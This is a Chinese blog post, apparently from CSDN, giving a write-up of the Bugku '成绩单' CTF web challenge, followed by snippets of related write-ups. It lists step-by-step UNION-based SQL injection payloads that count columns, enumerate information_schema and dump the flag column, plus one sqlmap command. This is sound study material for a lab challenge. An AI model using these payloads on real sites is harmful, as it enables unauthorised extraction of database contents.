bugku之成绩单

最新推荐文章于 2022-11-06 15:22:00 发布

原创最新推荐文章于 2022-11-06 15:22:00 发布 · 237 阅读

0 ·

CC 4.0 BY-SA版权

ctf-web 专栏收录该内容

24 篇文章

订阅专栏

题目链接
打开链接发现是一个表单
分别输入1，2，3有数据传回

那就应该是 sql注入呀~

1.首先爆字段

在输入框提交

id=1' order by 4#		正常返回数据

在这里插入图片描述

id=1' order by 5#		返回空

在这里插入图片描述
即可确定字段数为4

2.爆数据库名

0' union select 1,database(),user(),version()#

在这里插入图片描述
3.根据数据库名查询表名

id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'),user(),version()#

注意固定格式
[图片]
4.根据表名查列名

id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='skctf_flag' and table_name='fl4g'),user(),version()#

[图片]
5.根据列名查数据

id=0' union select 1,(select skctf_flag from fl4g),user(),version()#

在这里插入图片描述

有关的sql注入学习链接

1.Web安全篇之SQL注入攻击
 2.CTF之SQL注入详解

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

偷懒不学习

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BugkuCTF： 成绩单（web）

s0il的博客

04-02

910

题目描述：让人看上去就是SQL注入。提交一下，出现三列属性，flag就应该在这里面：手动注入：在表单中输入1或者1#或者1--或者1++等返回正常，输入1'返回异常库名、表名、字段名的获取：联合查询 id=-1' union select 1,2,3,4# 之后返回：或者执行-1' orde...

Bugku-web之成绩查询

weixin_42939822的博客

03-14

3640

今天是一道地地道道的sql注入题目，通过手动注入不仅可以加深对于sql语句的应用，也能够通过实战了解sql语句的运作，更好地体会到sql注入漏洞存在的潜在危害！！！ctf小白之旅继续前行！！！

参与评论您还未登录，请先登录后发表或查看评论

BugKu——成绩单

D-R0s1的博客

10-08

983

sql注入在CTF类竞赛中占着很大的比重，在做BugKu的题目的过程中恰好遇到了一个没有任何过滤，直接注入的题目，因为没有过滤，只是单纯的考察sql注入，所以步骤比较固定，语句也比较简单 1.首先，爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1，2，3都有回显，然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...

BUGKU-----成绩单

weixin_43803070的博客

07-04

264

放暑假的第三天，开启暑假的刷题之路，怎么说呢，学了三个月的安全，还是需要打一下基础，所以就来bugku刷题咯。拿道题，一看就是sql注入啦。啥都不说直接上payload。 ** 基础知识： ** 在做题之前必须要说一下基础知识： mysql中有一个数据库information里面有三个表，每个表中都有字段。如上图 1' //1'报错说明存在注入啦。 2. 1'--+ //我们加上注释之...

Bugku：成绩单

Newbiek的博客

04-02

1001

首先，正常输入测试： Burp发现其为post包，只有1到3可以进行查询：加单引号测试发现，这是一个注入点：猜测注入的类型，发现and 1=1没有变化，但是1=2也没有变化：不是数字型注入就试试字符型注入：下一步就到了测试页面回显的地方的时候了，因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列（可能还有隐藏的东西）：确认了回显...

bugku---成绩单

LuckySec

11-16

583

题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...

成绩单 （bugku--web）

小白的劝退之路

04-29

512

解法一：手工注入输入1，2，3分别能查到1，2，3号学生的成绩 SQL注入应该没跑了输入1’返回异常，输入1’–+返回异常，输入1’ #或者1’-- +返回正常，看来过滤了–+ 观察，表貌似有四列（名字，Math，English，Chinese），输入1’ order by 4#返回正常，输入1’ order by 5#返回异常，看来的确是4列接下来就开始暴库名、表名、字段名尝试联合查询，...

SQL注入最最最基础（bugku成绩单）

qq_51439282的博客

12-07

1658

SQL注入今天在b站看了sql注入基础的视频（up主：小学生Tony君的第1天–sql注入，如何一步一步获取数据），醍醐灌顶，来此记录一下心得体会。这里我们会拿BUGKU的成绩单这一题作为例题来讲解。题目链接：http://123.206.87.240:8002/chengjidan/ SQL注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中，再在后台 Sql 服务器上解析执行进行的攻击，它目前黑客对数据库进行攻击的最常用手段之一。 SQL注入原理这里拿构造id=1

一次简单的sql注入 bugku 成绩查询

jzw0831的博客

11-06

1243

一次简单的sql注入 bugku 成绩查询

Bugku成绩查询：一次简单的SQL注入过程

xhxtalent的博客

10-20

632

1很重要，一般来说在数据库中id不会有等于负数的，所以union联合查找前面部分的是错误的，故就是显示后面的查询内容，不然不会显示后面的查询内容的。一共查询到两个表名，分别是fl4g和sc表，我们需要但是flag，很大概率在fl4g表中，所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”，那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了，说明存在注入点的。递增上去，如果页面如果出现了错误，那么字段数就是当前的数字减1。分别输入1，2，3返回的是不同人名的成绩单。

bugku 成绩单详解

qq_35811830的博客

01-26

1364

bugku 成绩单详解首先打开查询成绩的页面在火狐浏览器下使用hackbar插件对页面进行post请求，分别依次输入id=1,2,3,4 当你这样去试了之后，就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩，但是当id=4的时候，成绩单里面的成绩又为空了。因此我们可以猜测数据库里面一共是有四列的然后在此处利用内置函数database()爆破获取数据库的名字。至于为什么使用u...

bugku-web-成绩单

a3uRa的一个窝

08-29

772

非常简单的sql注入 1 1’ 1‘# id=1' order by 1# id=1' order by 2# id=1' order by 3# id=1' order by 4# id=1' order by 5# id=' union select 1,2,3,4# id=' union select 1,2,3,database()# id=' union select 1,2,3,...

bugkuctf 成绩单

舞动的獾

06-20

821

bugkuctf成绩单用hackbar插件的post对它进行测试，之前测试了出现人的成绩单，所以测试4，或者更高. id=1' order by 5# 没有回显，所以试试4 id=1' order by 4# 所以可以知道有四列尝试联合查询记得把前面的查询数据置空，写成id=0即可，显示正常，说明确确实实存在这四列数据 id=0' union select 1,2,3,4 # ...

bugku 成绩单 总结

DreamHigh

08-28

3074

试题地址： http://40.125.170.89:49164/index.php 成绩查询龙龙龙的成绩单 Math English Chinese 60 60 70 方法一：常规方法进入这道题目我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显于是就开始爆破吧通过id=-1...

bugku 成绩单

rommel的博客

08-23

7358

成绩查询龙龙龙的成绩单 Math English Chinese 60 60 70 进入这道题目我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显于是就开始爆破吧通过id=-1' union select 1,2,3,database(

查询成绩表案例

wang_yaqin的博客

03-04

2302

一.环境准备 create table exam( id int primary key auto_increment, name varchar(20), english int, chinese int, math int ); insert into exam values (null,'张三',85,74,91); insert into exam values (null...

BUGKU web--writeup

Sanky0u的博客

08-15

1万+

因为已经看到过很多关于bugku平台上面web题的writeup，我想自己就不需要每道题都写了，只写自己比较有收获的几题的writeup，并且将自己收集到的好几种解法都放上来。1. 文件上传测试这道题提示上传php文件，但选择php文件上传的时候又提示非图片文件。解法1：将一个php文件的后缀名改成.php.jpg或者.php.png，然后选择这个文件，点击上传的时候用burpsuite抓包，改文件

bugku成绩单

qq_43677324的博客

03-09

983

bugku成绩单 详细解析 1，我们首先分别输入1,2,3，均有输出我们输入1’ 没有回响因此我们可以判断存在sql注入 2.我们分别输入 1' order by 1# 1' order by 2# 1' order by 3# 1' order by 4# 均有回响但是当我们使用 1' order by 5# 时，没有回响因此我们可以根据此判断字段数为4 3，之后就是最精彩的地...

bugku成绩单（sql注入）writeup